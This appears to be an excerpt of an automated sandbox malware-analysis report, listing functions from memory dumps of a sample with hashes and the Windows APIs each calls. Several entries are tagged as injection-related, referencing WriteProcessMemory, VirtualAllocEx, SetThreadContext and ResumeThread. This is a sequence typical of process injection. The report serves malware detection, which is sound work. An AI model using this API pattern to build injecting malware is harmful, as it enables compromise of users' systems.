Opcode ID: bd983770827ed0b694d23f0f28d537b5d7f3d8282151974ceb95a19469b81253
Instruction ID: 988d77359e86443d8786e3811ead9871c6be0bbce232eefb41fafce9589c063f
Opcode Fuzzy Hash: bd983770827ed0b694d23f0f28d537b5d7f3d8282151974ceb95a19469b81253
Instruction Fuzzy Hash: B451C3B1D00349DFEB14CF99C984ADEBBB5FF48310F24822AE819AB250D774A945CF51

Function 04F718F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F71A02

Memory Dump Source

Source File: 00000000.00000002.2185657409.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f70000_FT876567090.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 45940174b225b744b05db8466f56bab00932ef90f4f44a01c9a15bee1518827e
Instruction ID: 4614f8678d4698e793de8c1f507bcfe117f7878bb068e4bcb540f85df1b0b205
Opcode Fuzzy Hash: 45940174b225b744b05db8466f56bab00932ef90f4f44a01c9a15bee1518827e
Instruction Fuzzy Hash: 7D41A3B1D00349EFEB14CF99C984ADEBBB5BF48710F24812AE819AB210D775A945CF91

Function 04E4590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04E459C9

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 189e3dd41bb842827b84d3b0ad3da0015575fdc6c00237779102e49bfde3c2d0
Instruction ID: a05b048290eb8fd2040ba19b220449cd00d8d4bda20e61d1e13c9cb746270c2a
Opcode Fuzzy Hash: 189e3dd41bb842827b84d3b0ad3da0015575fdc6c00237779102e49bfde3c2d0
Instruction Fuzzy Hash: 5A41F1B0C00719DFEB24DFA9D8847CDBBB5BF89304F20816AD508AB294DB766946CF51

Function 04E444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04E459C9

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 53d17860fab4e2b88f2c2683daad420d3fd478137e5ae8a0c92ee51c9dd67131
Instruction ID: bdb2e39bc90a121d98698fa8d01fe2536999677e991c87b8ec8e847c89fb4d82
Opcode Fuzzy Hash: 53d17860fab4e2b88f2c2683daad420d3fd478137e5ae8a0c92ee51c9dd67131
Instruction Fuzzy Hash: B2410170C0071DDBEB24CFA9C884B8EBBB1BF89304F20806AD508AB250DB716945CF90

Function 04F74050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04F74111

Memory Dump Source

Source File: 00000000.00000002.2185657409.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f70000_FT876567090.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7043b6f87d320ebd4a7e0f736aa660407fa72e80080c03fba0444849d2b2b0d2
Instruction ID: 1dc5fd8438903755240fb012609091c901567fcd11587d194f8cd51735519c46
Opcode Fuzzy Hash: 7043b6f87d320ebd4a7e0f736aa660407fa72e80080c03fba0444849d2b2b0d2
Instruction Fuzzy Hash: 124127B5A00309DFDB14DF99C848AAABBF5FF88314F24C459D519AB321D378A841CFA0

Function 0553A9C8 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2186142415.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_FT876567090.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 672c751a214dec7e305f1236f032fb6f6487651e732b97cd8990fe6b6b34d554
Instruction ID: 110d83211253aba9375e48c9529cd3fe381e94ff1fb17301d751221892c983a9
Opcode Fuzzy Hash: 672c751a214dec7e305f1236f032fb6f6487651e732b97cd8990fe6b6b34d554
Instruction Fuzzy Hash: 15314776904249DFDB11CFA9C945AEEBFF8BF09310F14845AE658AB221C3399854DFA0

Function 04E45A84 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7825e98006041e025f9cbf062b249f9e34207a253948d581d56a6e130cc0a43
Instruction ID: cd77acf69c6f49dc403b009e0b87c22da471e3adfc2340c3b7536238d706f185
Opcode Fuzzy Hash: f7825e98006041e025f9cbf062b249f9e34207a253948d581d56a6e130cc0a43
Instruction Fuzzy Hash: 4E31AC71805709DFEF11CFA8D8957EDBBF1AF86718F104249C145AB2A1C779A946CB01

Function 070D44D9 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070D4570

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 00e7942757f56ec5583690fc873f8776535a001a7d514bbd0baf73c24381a3e1
Instruction ID: b1cdf5be3afe579fddef65e4e463bf6355cfc4639a4be6de4347ca0418883184
Opcode Fuzzy Hash: 00e7942757f56ec5583690fc873f8776535a001a7d514bbd0baf73c24381a3e1
Instruction Fuzzy Hash: 5C2137B1900349AFDF10CFAAC885BDEBBF4FF48310F108429E919A7241C7789954CBA5

Function 070D44E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070D4570

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f509905d644b1f1e00a6a57a3ab67bbd11fb3af608c0639c7e98e2af554cea44
Instruction ID: e6c1bec14fab37695802b5aaf2061010328e9cb057690b19b2018eef7a3649b9
Opcode Fuzzy Hash: f509905d644b1f1e00a6a57a3ab67bbd11fb3af608c0639c7e98e2af554cea44
Instruction Fuzzy Hash: 532124B19003599FDB10CFAAC885BDEBBF5FF48310F10842AE919A7241C7789954CBA4

Function 070D3F40 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070D3FC6

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1ecfec5cec327ef04de23056534996aa8d83c237073446b64c9717f789c4536a
Instruction ID: 8d76a4d578da8c0eccedf73b51f8d116821e0f12ba8cf3ae68557009afa2fa12
Opcode Fuzzy Hash: 1ecfec5cec327ef04de23056534996aa8d83c237073446b64c9717f789c4536a
Instruction Fuzzy Hash: 2A2135B1900309DFEB10DFAAC4857EEBBF4EF88310F14882AD419A7240CB789945CFA5

Function 04E4B830 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04E4D6E6,?,?,?,?,?), ref: 04E4D7A7

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c668503289b4a2c4f9047838542653f7b1bafbd45ccd6fcee23f6029c29ac2ab
Instruction ID: a799ebbb75143f48d37b8b4374c67cfc1d9b64ec4e88328bf4f159b57fbd25d7
Opcode Fuzzy Hash: c668503289b4a2c4f9047838542653f7b1bafbd45ccd6fcee23f6029c29ac2ab
Instruction Fuzzy Hash: 3021E3B5900248EFDB10CFAAD984ADEBBF8EF48310F14841AE914B7310D378A954CFA5

Function 070D45C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070D4650

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6876fb7926a0eb4dcc1d43befc3e98ca886956cb593ee0ee725cfb4d42ba1c95
Instruction ID: 7e69ea1b71004fe24f144082c1cd61902fa196df2040022922e58d932ae5fd0b
Opcode Fuzzy Hash: 6876fb7926a0eb4dcc1d43befc3e98ca886956cb593ee0ee725cfb4d42ba1c95
Instruction Fuzzy Hash: D82116B18003499FDF10DFAAC881BDEBBF5FF48310F10842AE919A7240C7789904CBA5

Function 04E4D719 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04E4D6E6,?,?,?,?,?), ref: 04E4D7A7

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2c821d6c94b23a2bedca80ff85f70ab6cd5f363cd667023fd351e754675e6d00
Instruction ID: 73f11a656da0e7107baceac79f29cdfd0b9f5c1dc983013ff84cc344fd5a2c4f
Opcode Fuzzy Hash: 2c821d6c94b23a2bedca80ff85f70ab6cd5f363cd667023fd351e754675e6d00
Instruction Fuzzy Hash: 8F21E3B5900249EFDB10CFAAD885ADEBBF4EB48314F14841AE918A7310D378A954CF65

Function 070D3F48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070D3FC6

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 27f014d825ca01bb931fc3624f8fec9b85e467ee1d0e51123d58aed420c5c58b
Instruction ID: 8cdb17b0f882d033e6f85995fa1e07277262c50712729ab78cbebafd4295afbe
Opcode Fuzzy Hash: 27f014d825ca01bb931fc3624f8fec9b85e467ee1d0e51123d58aed420c5c58b
Instruction Fuzzy Hash: 052115B1900309DFDB10DFAAC4857EEFBF4AF88310F14842AD519A7240CB78A944CFA5

Function 070D45D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070D4650

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c81b1b422aaba58461c116ef4c135f553de2078a786a3380a033c0ff4a94f4e8
Instruction ID: 125b164ab215d02a175b4ed7737dd49a817a05e46b5d8a596e49fc6ad6b9bc69
Opcode Fuzzy Hash: c81b1b422aaba58461c116ef4c135f553de2078a786a3380a033c0ff4a94f4e8
Instruction Fuzzy Hash: 802128B18003499FDB10CFAAC881BDEBBF5FF48310F108429E919A7240C7789900CBA5

Function 070E7CB8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 070E7D33

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: dbf546e4b757ec7b4db0d8b256494f66088104100bc990fd22121beb78802f9b
Instruction ID: eba139cd8574c12078c130ecddc5eb21400c899992b2feac1d313178ea18ea31
Opcode Fuzzy Hash: dbf546e4b757ec7b4db0d8b256494f66088104100bc990fd22121beb78802f9b
Instruction Fuzzy Hash: 0D21F7B5904349DFDB10CF9AC885BDEBBF4FB48310F108429E558A7650D774A544CFA5

Function 070D4018 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070D408E

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 283d382edbc813b098c84e9cd44baf497f6256e4f912d9c3946b51f6f0774541
Instruction ID: 860143172fb43d40b2303fc9414133dfe8366d4fe814c51214a909fc3eea820e
Opcode Fuzzy Hash: 283d382edbc813b098c84e9cd44baf497f6256e4f912d9c3946b51f6f0774541
Instruction Fuzzy Hash: 1A115675800349AFDB10CFAAC845BDEBBF5EF88310F108819E515A7210C7759940CBA5

Function 05539C10 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0553A9E2,?,?,?,?,?), ref: 0553AA87

Memory Dump Source

Source File: 00000000.00000002.2186142415.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_FT876567090.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 6a0a04928a297e518560411842b641234b1fa423dafd85fd5a30c46b84a9c8a0
Instruction ID: f43b1bbb7d7b8a8814f0bfa0d639a683f32e9a6098061288cf639cfc04944e34
Opcode Fuzzy Hash: 6a0a04928a297e518560411842b641234b1fa423dafd85fd5a30c46b84a9c8a0
Instruction Fuzzy Hash: 821114B2804249EFDB10CFAAC945BDEBFF8EB48310F14841AE559A7210C379A954CFA5

Function 070E7CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 070E7D33

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3870ee2363bd171cd2ae1587308e4f10b1983b305cc777c39d03ca5a282d632e
Instruction ID: fdce6138766912dbbbe33b3359586f8fb7b3a9160494141adece3b2557113785
Opcode Fuzzy Hash: 3870ee2363bd171cd2ae1587308e4f10b1983b305cc777c39d03ca5a282d632e
Instruction Fuzzy Hash: C521E4B5900649DFDB10CF9AC884BDEFBF8FB48320F108429E958A7250D378A544CFA5

Function 070D4020 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070D408E

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2b17e2ee4fe890aed3b0b79a4456616a1de3e0dc7c7dcdd1b59279114f39221e
Instruction ID: 9d153d06f088d237e054fae33a28bfba232925f3e775c04356b86161decb89bc
Opcode Fuzzy Hash: 2b17e2ee4fe890aed3b0b79a4456616a1de3e0dc7c7dcdd1b59279114f39221e
Instruction Fuzzy Hash: 9C1153718003499FDB20CFAAC845BDEBBF5AF88320F148819E919A7250C779A900CFA0

Function 070D3A58 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 070D3AC2

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f7ffff5dc78187c05dd7ffd807e7b5b9c1272f20575937ddc4726eec540d5aee
Instruction ID: fba66e3fda6ebfaa00ab7d96ddf4fe530a39fac1030414e55f1d20699d756f0d
Opcode Fuzzy Hash: f7ffff5dc78187c05dd7ffd807e7b5b9c1272f20575937ddc4726eec540d5aee
Instruction Fuzzy Hash: DE1146B1900349DFDB10CFAAD8457EEFBF5AF88310F248819C519A7640C7799944CBA5

Function 070D86EA Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 070D874D

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1db1c570244d673dbfec965700f9a6524da47b8e25783dea4984910d6dec320e
Instruction ID: 1f97250f2fde56cdbaafe4557c4860b778dc3f16cabc43be499a98c276e5a4e4
Opcode Fuzzy Hash: 1db1c570244d673dbfec965700f9a6524da47b8e25783dea4984910d6dec320e
Instruction Fuzzy Hash: F31106B5800349DFDB10DF9AD985BDEFBF8EB48720F10841AE514A7240C375A944CFA1

Function 070D3A60 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 070D3AC2

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 024deadfec9f7f2c8422f7aec25a36d10caee0fc9287a007a135d869271932dc
Instruction ID: 87fbb3a1b9b944b090b5e3e08ca2f8f7dd9b4be46e1b9e6993a121e02d402c33
Opcode Fuzzy Hash: 024deadfec9f7f2c8422f7aec25a36d10caee0fc9287a007a135d869271932dc
Instruction Fuzzy Hash: 74113AB1D00349DFDB10DFAAC44579EFBF4EF88710F148819D519A7240C779A944CBA5

Function 04E4B038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04E4B09E

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f0a50678b6e9c9ce18abdc33ac3af52699c4569fae8c71f3f751c3804bc17579
Instruction ID: a5b3acbf76708106ae36ab202d0d0868efe8fe7c11a8cc2bb42df1eb2c4aa54c
Opcode Fuzzy Hash: f0a50678b6e9c9ce18abdc33ac3af52699c4569fae8c71f3f751c3804bc17579
Instruction Fuzzy Hash: 181110B5C00749CFDB20CF9AD444BDEFBF4AB88314F10841AD928A7210D379A545CFA1

Function 070D41AC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 070D874D

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8c2fdf44c7463b416deeac7eb10aa675e01c47d86b03455c42cf9cb8bd1732f8
Instruction ID: 4a9facfd06bc6d3831e0ee42ce098ae645cafa0829a754ca8f35b1de93bd644a
Opcode Fuzzy Hash: 8c2fdf44c7463b416deeac7eb10aa675e01c47d86b03455c42cf9cb8bd1732f8
Instruction Fuzzy Hash: D91103B5800749DFDB10DF9AD885BDEBBF8FB48720F108459E518A7250C375A944CFA5

Function 00DAD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2175628180.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12a854fd001a923bb0a296930e192f9ce87413937fb367b62879628531f95a7
Instruction ID: 229fe5ea1ad1cfd06045b14eb8b69da80b9f73c3ac0be2d9ed823b2a730fc24a
Opcode Fuzzy Hash: a12a854fd001a923bb0a296930e192f9ce87413937fb367b62879628531f95a7
Instruction Fuzzy Hash: D8212572500304EFDB04DF14D9C0B26BF66FB99324F24C56DE90A0B656C37AE856CAB2

Function 00DAD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2175628180.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984750d6001088e8f4eaf099946a518c39230f1504a5b1417fc6e54abc8122ff
Instruction ID: 8aef3c98797f09816cc8e33d24a5ceb75b4564678eccb61d9635e008e0b5ca9f
Opcode Fuzzy Hash: 984750d6001088e8f4eaf099946a518c39230f1504a5b1417fc6e54abc8122ff
Instruction Fuzzy Hash: 83212572904240EFDB05DF14D9C0B26BF66FB8A318F24C569E94A0B656C336D856CBB2

Function 00DBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177046477.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d0c86e6146dda55cebbc4f5de16b3a7424dea8a6d2ea00708d14aff469494f
Instruction ID: 136a7d213441255de02b4fae3f3901f6f75758e6df92d74f3e3d5b10fd862967
Opcode Fuzzy Hash: 42d0c86e6146dda55cebbc4f5de16b3a7424dea8a6d2ea00708d14aff469494f
Instruction Fuzzy Hash: 25210475604304EFDB14EF24D9C0B66BB66FB88314F24C56DE94A4B286D33AD847CA71

Function 00DBD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177046477.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046a94fa91ae7cb706f1766c07f2d478ac917716f0ec048a2fc0c6dec3941063
Instruction ID: 4cb3beac9f09053aaa560cde1d38d934dc0b4edab611ecd92b734be7e57c1ec0
Opcode Fuzzy Hash: 046a94fa91ae7cb706f1766c07f2d478ac917716f0ec048a2fc0c6dec3941063
Instruction Fuzzy Hash: 62213471604380EFDB04DF24D9C0B26BBA2FB84318F24C56DE84A4B282D336D846CB71

Function 00DBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177046477.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97b1adc70b3471fab01e46dd35506b62622146d172956e76250f9bf6ba94007
Instruction ID: 321633190f17fd09fe3c8603b35cc10f88db7e2f7d26b413e199ab28c5054996
Opcode Fuzzy Hash: c97b1adc70b3471fab01e46dd35506b62622146d172956e76250f9bf6ba94007
Instruction Fuzzy Hash: AB218E75509380DFCB02DF20D990715BF72EB46314F28C5EAD8498F2A7C33A980ACB62

Function 00DAD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2175628180.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: 7ce2093f4ddf549c9cac4020847c9a020130d5b58308560f4a68fa6cb14e3c61
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: 8C11E676504240DFDB15CF10D5C4B16BF72FB99324F28C6A9D80A0B657C37AE85ACBA2

Function 00DAD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2175628180.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: a17c9c431dc6e874a7e7c69890310b90758414a69bb2358be01f676dbc16db27
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: CD11E676904280DFCB15CF10D5C4B16BF72FB95314F28C6A9D84A0B656C33AD85ACBA2

Function 00DBD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177046477.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dbd000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: b39fdd229d63e42fc0e057c4a13417ea1b30b0aeb182651cac5abf8486fcc240
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: CB118B75904284DFCB15CF10D5C4B55FFA2FB84314F28C6A9D84A4B696D33AD84ACB62

Function 00DAD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2175628180.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dad000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e779e0ddb151e818895d97d641df260554c87bd8d4d927cf2d9ba9497bdb5d
Instruction ID: 5a6ee18bebf83031be6928019f278846462c64bfab8dc957af5606e32c024c1e
Opcode Fuzzy Hash: c8e779e0ddb151e818895d97d641df260554c87bd8d4d927cf2d9ba9497bdb5d
